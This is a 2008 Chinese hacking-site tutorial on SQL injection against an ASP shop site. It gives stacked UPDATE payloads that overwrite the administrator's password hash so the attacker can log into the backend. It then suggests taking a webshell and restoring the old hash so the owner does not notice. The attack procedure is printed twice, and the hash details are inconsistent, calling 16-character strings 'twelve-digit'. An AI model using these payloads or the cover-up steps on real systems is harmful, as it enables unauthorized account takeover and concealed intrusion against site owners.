注射修改系统管理员密码实用技巧
新客网 XKER.COM 2008-05-21 来源:微电脑世界 收藏本文
注入点已经找到:xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。
可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 我们来尝试欺骗。可以看出,欺骗是没戏滴。 那咋办?难道要跑密码?那得浪费多少时间和内存啊?
下面我来介绍一种新方法:注射。注射的语句如下: ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码 这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我们来测试。看见了,页面没有返回错误,表示成功了。
现在我们对shop_admin表段下的密码做重新解猜。 [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家对比一下,已经改变了。现在我们可以登陆了。 进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。
接着,别忘了把管理员密码还原。不然他会发现滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--
可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 我们来尝试欺骗。可以看出,欺骗是没戏滴。 那咋办?难道要跑密码?那得浪费多少时间和内存啊?
下面我来介绍一种新方法:注射。注射的语句如下: ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码 这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我们来测试。看见了,页面没有返回错误,表示成功了。
现在我们对shop_admin表段下的密码做重新解猜。 [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家对比一下,已经改变了。现在我们可以登陆了。 进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。
接着,别忘了把管理员密码还原。不然他会发现滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--
0
最新相关文章发表评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
推荐阅读
阅读排行
随机推荐
实用信息推荐